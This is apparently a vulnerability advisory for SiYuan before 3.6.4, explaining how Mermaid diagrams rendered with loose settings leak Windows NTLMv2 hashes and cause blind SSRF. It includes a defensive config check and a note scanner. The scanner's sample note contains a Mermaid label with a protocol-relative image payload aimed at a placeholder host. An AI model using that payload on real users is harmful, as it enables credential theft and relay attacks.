SiYuan Zero-Click NTLM Hash Theft and Blind SSRF Vulnerability via Mermaid Diagram Rendering

Vulnerability

A vulnerability in SiYuan versions prior to 3.6.4 allows for zero-click theft of NTLMv2 hashes on Windows systems, alongside blind server-side request forgery (SSRF) from the victim's machine. This issue arises because SiYuan configures Mermaid.js with 'securityLevel: loose' and 'htmlLabels: true', enabling <img> tags with src attributes to bypass internal sanitization and be injected into the DOM as part of an SVG. When a note containing a malicious Mermaid diagram is opened, the Electron client fetches the image URL. On Windows, a protocol-relative image URL is resolved as a UNC path, which automatically triggers SMB authentication and sends the victim's NTLMv2 hash to the attacker.

Impact

Exploitation leads to unauthorized access to the victim's NTLMv2 hash, which can be cracked offline or used in relay attacks. The vulnerability also creates a blind SSRF condition, with the victim's machine making an unsolicited request to an external server.

Reproduction

To reproduce this vulnerability, create a note in SiYuan with a Mermaid code block that includes an image tag pointing to an external server. When the note is opened, SiYuan will render the diagram and inject the SVG into the DOM. On Windows, the image request will be resolved as a UNC path, triggering the automatic SMB authentication that sends the NTLMv2 hash to the attacker.
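The two settings named under Vulnerability and the image-tag diagram described under Reproduction can both be checked from the defender's side. The following is an added example, not SiYuan's or Mermaid's own code: it shows the weak Mermaid options beside a hardened set, a check that reports which of the two risky options are present, and a scanner that finds <img> sources inside Mermaid code blocks of a note and flags the ones a Windows Electron client would fetch as UNC paths. The configuration object shape, the function names, and the sample note (with its placeholder host) are assumptions constructed for the example.

```javascript
// Added example (not SiYuan's or Mermaid's own code): defender-side checks for
// the risky Mermaid settings named in the advisory, plus a scanner that flags
// <img> sources in diagram text that Windows would fetch as UNC paths.
// Function names, the config object shape and the sample note are constructed.

// Assumed shape of the options passed to mermaid.initialize(); only the two
// keys the advisory mentions are inspected.
const WEAK_MERMAID_CONFIG = { securityLevel: 'loose', htmlLabels: true };
const HARDENED_MERMAID_CONFIG = { securityLevel: 'strict', htmlLabels: false };

// Returns a list of reasons the configuration lets raw HTML into the rendered SVG.
function mermaidConfigFindings(cfg) {
  const findings = [];
  if (cfg.securityLevel === 'loose') {
    findings.push("securityLevel 'loose' disables Mermaid's HTML sanitization");
  }
  if (cfg.htmlLabels === true) {
    findings.push('htmlLabels true renders node labels as HTML, so <img> tags are allowed');
  }
  return findings;
}

// Classify an image src the way a Windows Electron client would treat it when fetching.
function classifyImageSource(src) {
  const s = src.trim();
  // Protocol-relative (//host/...) or explicit \\host\... resolves as a UNC path on Windows.
  if (/^\\\\/.test(s) || /^\/\//.test(s)) return 'unc-candidate';
  if (/^file:/i.test(s)) return 'file';
  if (/^https?:\/\//i.test(s)) return 'remote';
  if (/^data:/i.test(s)) return 'inline';
  return 'relative';
}

// Find every <img ... src=...> in Mermaid diagram text, whatever the quoting style.
function findImageSources(diagramText) {
  const re = /<img\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const found = [];
  let m;
  while ((m = re.exec(diagramText)) !== null) {
    const src = m[1] ?? m[2] ?? m[3];
    found.push({ src, kind: classifyImageSource(src) });
  }
  return found;
}

// Three backticks, built at runtime so the example itself contains no literal fence.
const FENCE = '`'.repeat(3);

// Scan a note's Mermaid code blocks and return the image sources that cause an
// outbound fetch (UNC candidates, remote hosts, file: URLs).
function riskyImagesInNote(noteMarkdown) {
  const blockRe = new RegExp(FENCE + 'mermaid\\s*\\n([\\s\\S]*?)' + FENCE, 'g');
  const risky = [];
  let m;
  while ((m = blockRe.exec(noteMarkdown)) !== null) {
    for (const img of findImageSources(m[1])) {
      if (img.kind === 'unc-candidate' || img.kind === 'remote' || img.kind === 'file') {
        risky.push(img);
      }
    }
  }
  return risky;
}

// Constructed sample note: one benign diagram and one whose HTML label carries a
// protocol-relative image src (placeholder host, not a real target).
const SAMPLE_NOTE = [
  '# Weekly plan',
  FENCE + 'mermaid',
  'graph TD',
  '  A[Start] --> B[Done]',
  FENCE,
  'Some text.',
  FENCE + 'mermaid',
  'graph LR',
  '  X["<img src=\'//placeholder.invalid/share/pixel.png\'>"] --> Y[End]',
  FENCE,
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(mermaidConfigFindings(WEAK_MERMAID_CONFIG));   // two findings
  console.log(mermaidConfigFindings(HARDENED_MERMAID_CONFIG)); // []
  console.log(riskyImagesInNote(SAMPLE_NOTE));                 // one unc-candidate
}
```

A protocol-relative src is flagged even though an ordinary browser page would resolve it against the page's own scheme; the advisory's point is precisely that the Electron client on Windows resolves it as \\host\share instead, so any such src in a label is treated as an outbound SMB request. The same scanner can run server-side on note import or sync, where stripping or rejecting the diagram prevents the fetch before the note is ever opened.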

Remediation

Users can update to SiYuan version 3.6.4 or later, where this vulnerability has been fixed.

Added: Apr 10, 2026, 1:24 AM
Updated: Apr 10, 2026, 1:24 AM

Vulnerability Rating

Custom Algorithm
spread: 0.3
impact: 2.5
exploitability: 7.2
remediation: 7.7
relevance: 5.5
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.